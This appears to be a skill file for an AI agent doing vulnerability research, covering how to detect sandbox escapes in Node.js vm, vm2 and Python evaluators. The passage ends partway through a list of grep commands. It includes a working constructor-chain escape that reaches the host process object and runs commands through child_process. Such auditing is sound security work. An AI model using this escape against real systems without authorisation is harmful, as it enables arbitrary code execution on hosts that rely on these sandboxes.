sandbox-escapelisted
Install: claude install-skill Liaabnormal676/find-cve-agent
# Sandbox Escape Detection
## When to Use
Audit any package that uses node:vm, vm2, isolated-vm, simpleeval, RestrictedPython, or custom expression evaluators to run untrusted code.
## Key Insight
**node:vm is NOT a security mechanism.** The Node.js documentation explicitly states this. Constructor chains ALWAYS escape the sandbox. If a package uses `vm.runInNewContext()` to isolate untrusted code, it is vulnerable.
## The Constructor Chain (node:vm)
The fundamental escape from node:vm:
```js
// Inside vm.runInNewContext({}, {}):
this.constructor.constructor('return process')()
// Returns the real process object from the host
```
Then achieve RCE:
```js
const process = this.constructor.constructor('return process')();
process.mainModule.require('child_process').execSync('id').toString();
```
### Why This Works
1. `this` refers to the sandbox object
2. `this.constructor` is `Object` (from the outer realm)
3. `Object.constructor` is `Function` (from the outer realm)
4. `Function('return process')()` executes in the outer realm
5. `process` gives access to `require` and the full Node.js API
## Process
### Step 1: Find Sandbox Usage
```
# node:vm
grep -rn "require.*vm.*\|from.*vm" . --include="*.js" --include="*.ts"
grep -rn "vm\.runIn\|vm\.createContext\|vm\.Script\|vm\.compileFunction" .
grep -rn "new Script\|runInNewContext\|runInThisContext\|runInContext" .
# vm2 (deprecated)
grep -rn "require.*vm2\|from.*vm2\|new VM(\|new NodeVM(" .
# Python sandboxes
grep -rn